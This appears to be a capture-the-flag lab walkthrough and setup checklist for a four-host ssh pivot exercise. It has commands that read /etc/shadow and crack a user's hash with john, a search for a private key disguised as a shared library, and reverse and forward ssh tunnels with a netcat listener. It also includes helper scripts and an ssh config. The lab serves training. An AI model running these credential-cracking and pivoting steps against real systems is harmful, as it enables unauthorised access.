gotty > student@c2t2-000-bchd

  STEPS:
    0. find a throwaway flag (first)
       grep COG *.txt
    1. find the outbound ssh connection on port 1863 (bchd has a cron job that sshes out to crust; look for it with ss or netstat)
       - watch -n1 -d ss -antp
       - tcpdump -i ens3 not port 2222 and ip
    2. run john against /etc/shadow to get the axel user's password
       - build a wordlist from the Norse clue book with cewl, then crack only axel's hash
         sudo apt install cewl john
         python -m SimpleHTTPServer &        # python 2; on python 3 use: python3 -m http.server 8000 &
         cewl localhost:8000/heimskringla.txt -w words
         sudo grep '^axel:' /etc/shadow > axel.shadow
         john --wordlist=words axel.shadow
         # HINT: only crack the hash you want (the student hash has rounds=656000 and will eat all your time)
    3. find the hostname crust
       nslookup <IP from ss -ant>
    4.

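  Added example (not part of the original notes): small sh helpers for the bchd steps above. The first picks the
  established outbound connection to a given peer port out of `ss -antp` output instead of watching for it by eye;
  the other two pull one account's line out of a shadow-format file and report its sha512crypt rounds, which is how
  you spot the 656000-round student hash before handing anything to john. The ss output and shadow lines in the
  block are constructed for the example (the hash bodies are placeholders, not real hashes).

```shell
#!/bin/sh
# Added example (not from the original notes): helpers for the bchd recon steps.
# All sample input below is constructed for the example.

# Print ESTABLISHED TCP connections whose peer port is $1, from `ss -antp`
# output on stdin. Columns: State Recv-Q Send-Q Local:Port Peer:Port Process.
outbound_to_port() {
    awk -v port="$1" '
        $1 == "ESTAB" {
            n = split($5, peer, ":")   # peer may be IPv6, so the port is the last field
            if (peer[n] == port) print $5, $NF
        }'
}

# Print one account's ($1) line from a shadow-format file ($2, or stdin when
# omitted) so john only works on that hash (the HINT in step 2).
shadow_entry() {
    awk -F: -v u="$1" '$1 == u' ${2:+"$2"}
}

# Report the sha512crypt/sha256crypt rounds of an account's hash: the explicit
# rounds=N value, or "default" (5000) when none is set.
hash_rounds() {
    awk -F: -v u="$1" '
        $1 == u {
            split($2, h, "$")          # $6$rounds=N$salt$hash  or  $6$salt$hash
            if (h[3] ~ /^rounds=/) { sub(/^rounds=/, "", h[3]); print h[3] }
            else print "default"
        }' ${2:+"$2"}
}

# Constructed `ss -antp` output: one inbound sshd session and one outbound ssh.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:2222        0.0.0.0:*
ESTAB  0      0      10.10.0.10:2222     10.10.0.1:51234    users:(("sshd",pid=812,fd=4))
ESTAB  0      0      10.10.0.10:40122    10.10.0.11:1863    users:(("ssh",pid=2231,fd=3))'

# Constructed shadow file: a deliberately slow student hash and a normal axel hash.
SAMPLE_SHADOW=$(mktemp)
cat > "$SAMPLE_SHADOW" <<'EOF'
student:$6$rounds=656000$c0nstructed$placeholderhash:19000:0:99999:7:::
axel:$6$c0nstructed$placeholderhash:19000:0:99999:7:::
EOF

# On the live box:
#   ss -antp | outbound_to_port 1863
#   sudo cat /etc/shadow | shadow_entry axel > axel.shadow && john --wordlist=words axel.shadow
printf '%s\n' "$SAMPLE_SS" | outbound_to_port 1863
hash_rounds student "$SAMPLE_SHADOW"
hash_rounds axel "$SAMPLE_SHADOW"
```

  Why the rounds check matters: john's speed on sha512crypt scales inversely with the rounds value, so a
  656000-round hash is roughly 130x slower per guess than the 5000-round default; cracking only the line you
  need is the difference between minutes and a wasted afternoon.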
axel@crust

  STEPS:
    1. find the PEM private key file buried on the crust server (it is named like a shared library but is not an ELF)
       find / -type f -name '*.so' 2>/dev/null | xargs -I {} -P0 file {} | egrep -v "ELF|ASCII|python|terminfo"
       ssh-keygen -l -f <FILE>        # prints a fingerprint only if it really is a key
    2. ssh to mantle (but there is more to do on crust as axel first)
    3. watch the syslog that is running on crust (mantle is its rsyslog client)
       a. a flag gets catted into the log every 5 min, along with netstat output and failed attempts to connect to port 1337 (core's netcat cron job, with nothing listening on mantle yet)
    4. use that key to get to lindenbrock@mantle -> no shell there, just a key, so it is only good for tunnels

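  Added example (not part of the original notes): the `find | file` pipeline in step 1 depends on `file` being
  installed and on guessing the right things to egrep out. This sh version does the same hunt with nothing but the
  ELF magic bytes: any *.so whose first four bytes are not 7f 45 4c 46 is not a shared object and worth a look.
  A second helper classifies a candidate by its header so you know whether ssh will read it as a PEM or an OpenSSH
  key. The demo tree, the libreal.so stub and the key body are constructed for the example; only the
  libstdkey.so name is taken from the notes.

```shell
#!/bin/sh
# Added example (not from the original notes): find files named *.so that are
# not real shared objects, i.e. a private key parked under a library name,
# using only the ELF magic bytes (no dependency on `file`).

# Print every *.so under $1 whose first four bytes are not 7f 45 4c 46 ("\x7fELF").
find_fake_so() {
    find "$1" -type f -name '*.so' 2>/dev/null | while IFS= read -r f; do
        magic=$(head -c 4 "$f" | od -An -tx1 | tr -d ' \n')
        [ "$magic" = "7f454c46" ] || printf '%s\n' "$f"
    done
}

# Classify a candidate by its first line: "openssh" for the new OpenSSH
# format, "pem" for traditional PEM keys, "unknown" for anything else.
key_kind() {
    case "$(head -n 1 "$1")" in
        "-----BEGIN OPENSSH PRIVATE KEY-----") echo openssh ;;
        "-----BEGIN RSA PRIVATE KEY-----"|"-----BEGIN EC PRIVATE KEY-----"|"-----BEGIN PRIVATE KEY-----") echo pem ;;
        *) echo unknown ;;
    esac
}

# Constructed demo tree: one ELF-looking stub and one key hidden as a .so.
DEMO_DIR=$(mktemp -d)
mkdir -p "$DEMO_DIR/usr/lib/coreutils"
printf '\177ELF\002\001\001' > "$DEMO_DIR/usr/lib/coreutils/libreal.so"
printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nAAAAc29tZWtleWRhdGE=\n-----END OPENSSH PRIVATE KEY-----\n' \
    > "$DEMO_DIR/usr/lib/coreutils/libstdkey.so"

# On the real box:  find_fake_so /   then   ssh-keygen -l -f <FILE>
find_fake_so "$DEMO_DIR" | while IFS= read -r f; do
    printf '%s: %s\n' "$f" "$(key_kind "$f")"
done
```

  Usage note: if ssh refuses the found file with an "UNPROTECTED PRIVATE KEY FILE" warning, copy it somewhere you
  own and chmod 600 the copy before passing it to -i.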
lindenbrock@mantle

  STEPS:
    0. no shell here -- so always use -N (no remote command) and -T (no tty); sshd has GatewayPorts yes, so a -R forward may bind 0.0.0.0 on mantle
    1. reverse forward mantle:1337 to a netcat on crust to receive a flag and a clue for how to get to core (BONUS wireguard?)
       ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -R 0.0.0.0:1337:localhost:1337 -v
       on crust: nc -l -p 1337
       (core's netcat cron job connects to mantle:1337 and ssh carries it back to localhost:1337 on crust)
    2. save the output to a file; the clue should be a key, so verify it
       ssh-keygen -l -f <FILE>
    3. forward tunnel through mantle to core's ssh port, then ssh to localhost:22175 with the key from step 2
       ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -L 22175:c2t2-001-core:22175 -v

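  Added example (not part of the original notes): a ~/.ssh/config for crust that captures the two tunnels above so
  they stop being long command lines, plus a ProxyJump entry for core. A jump through mantle works even though
  lindenbrock has no shell there, because ProxyJump only opens a direct-tcpip channel (the same thing the -L
  forward uses). Host names, the lindenbrock user and the libstdkey.so path come from the notes; the
  ~/.ssh/core-key path for the key received over the 1337 tunnel is an assumption. SessionType needs OpenSSH 8.7
  or newer; on older clients drop it and keep passing -N.

```sshconfig
# Added example (not from the original notes): ~/.ssh/config on crust.

# Settings shared by every connection to mantle, including the ProxyJump hop below.
Host mantle-flag mantle-core c2t2-001-mantle
    HostName c2t2-001-mantle
    User lindenbrock
    IdentityFile /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so
    IdentitiesOnly yes
    # no shell on mantle: never ask for a session or a tty (same as -N -T)
    SessionType none
    RequestTTY no
    # die instead of silently running with no tunnel if the bind is refused
    ExitOnForwardFailure yes

# Step 1: needs GatewayPorts yes in mantle's sshd_config for the 0.0.0.0 bind.
# Run "nc -l -p 1337" on crust first, then "ssh -v mantle-flag".
Host mantle-flag
    RemoteForward 0.0.0.0:1337 localhost:1337

# Step 3: "ssh mantle-core", then "ssh -p 22175 -i ~/.ssh/core-key lindenbrock@localhost".
Host mantle-core
    LocalForward 22175 c2t2-001-core:22175

# Alternative to step 3: one hop, no local listener, only AllowTcpForwarding on mantle.
# Assumes the key from step 2 was saved as ~/.ssh/core-key (chmod 600).
Host core
    HostName c2t2-001-core
    Port 22175
    User lindenbrock
    ProxyJump lindenbrock@c2t2-001-mantle
    IdentityFile ~/.ssh/core-key
    IdentitiesOnly yes
```

  IdentitiesOnly keeps ssh from offering every key in the agent before the right one, which matters on a box
  whose sshd logs every inbound attempt and ships those logs to crust.
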
lindenbrock@core

  STEPS:
    0. play game

CONFIG Changes:

  bchd:
    - <x> Add axel user to bchd with an easily john'd password
    - <x> FLAG: /bin/nope for axel's shell
    - <x> CLUE_FILE: Norse book with axel@crust password and flag in it
    - <x> outbound cron job sshing to crust

  crust:
    - <~> ssh port 1862 on crust
    - <x> Disable student ssh login with echo shell
    - <x> FLAG FILE: pem is somewhere on this machine - flag in it
    - <x> rsyslog server

  mantle:
    - <x> lindenbrock public key auth
    - <x> rsyslog client
    - <x> sshd GatewayPorts yes
    - <x> log new inbound connections

  core:
    - <x> netcat cron job to mantle port 1337
    - <x> authorized key proxy traffic to tower 22175
    - <~> ssh port 22175
    - <x> only allow ssh traffic from tower and mantle - ansible from="mantleip" in authorized_keys

BONUS:

change MOTD on all servers
fake logs into crust rsyslog